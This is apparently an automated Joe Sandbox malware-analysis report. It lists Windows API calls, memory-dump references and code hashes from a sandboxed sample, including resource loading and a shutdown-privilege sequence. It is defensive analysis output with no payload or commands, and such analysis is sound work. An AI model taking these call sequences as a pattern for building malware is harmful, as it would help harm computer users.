                                                                              control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                              • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                              • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                              • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1658689577-0
                                                                              • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                              • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                              • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                              • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                              • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                              • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                              • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastWrite
                                                                              • String ID:
                                                                              • API String ID: 442123175-0
                                                                              • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                              • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                              APIs
                                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1306739567-0
                                                                              • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                              • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                              • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                              • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(?,02147CA0,0040A08C,00000000), ref: 004076B3
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 734332943-0
                                                                              • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                              • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                              • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                              • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                              APIs
                                                                              • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrev
                                                                              • String ID:
                                                                              • API String ID: 122130370-0
                                                                              • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                              • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                              • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                              • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                              • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                              • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                              • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                              • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                              • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                              • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                              • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                              • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                              • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                              • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                              • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                              • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                              • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                              • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                              • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                              APIs
                                                                              • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: SystemTime
                                                                              • String ID:
                                                                              • API String ID: 2656138-0
                                                                              • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                              • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                              • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                              • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
